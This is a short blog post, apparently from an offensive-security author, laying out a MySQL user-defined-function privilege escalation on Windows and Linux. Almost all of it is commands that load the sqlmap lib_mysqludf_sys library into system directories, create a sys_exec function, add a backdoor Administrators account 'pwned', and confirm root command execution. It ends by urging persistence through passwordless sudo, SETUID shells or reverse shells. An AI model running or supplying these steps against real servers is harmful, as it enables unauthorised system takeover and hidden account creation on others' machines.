# MySql User-Defined Function (UDF) Privilege Escalation (Windows & Linux)

**Published by:** [int0x33](https://paragraph.com/@int0x33/)
**Published on:** 2021-11-17
**URL:** https://paragraph.com/@int0x33/mysql-user-defined-function-udf-privilege-escalation-windows-linux

## Content

We will get into making our own functions in later posts but for now, the UDF compiled shared objects from SQLMap are great. https://github.com/int0x33/sqlmap/tree/master/udf/mysqlWindows Escalationmysql> USE mysql; mysql> CREATE TABLE pwn(line blob); mysql> INSERT INTO pwn values(load_file('C://xampplite//htdocs//mail//lib_mysqludf_sys.dll')); mysql> SELECT * FROM mysql.pwn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll'; mysql> CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll'; mysql> SELECT sys_exec("net user pwned pwn123! /add"); mysql> SELECT sys_exec("net localgroup Administrators pwned /add"); Linux Escalationmysql> use mysql; mysql> create table pwn(line blob); mysql> insert into pwn values(load_file('/home/npn/lib_mysqludf_sys.so')); mysql> select * from pwn into dumpfile '/usr/lib/lib_mysqludf_sys.so'; mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so'; mysql> select sys_exec('id > /tmp/out; chown npn.npn /tmp/out'); Verify Command Executionuser@box:/$ cat /tmp/out uid=0(root) gid=0(root) groups=0(root) You can now execute code as root, what more do you need? You can allow SUDO all no password or create SETUID shell program with c, execute a reverse shell, etc, whatever you want. Be creative.

## Publication Information

- [int0x33](https://paragraph.com/@int0x33/): Publication homepage
- [All Posts](https://paragraph.com/@int0x33/): More posts from this publication
- [RSS Feed](https://api.paragraph.com/blogs/rss/@int0x33): Subscribe to updates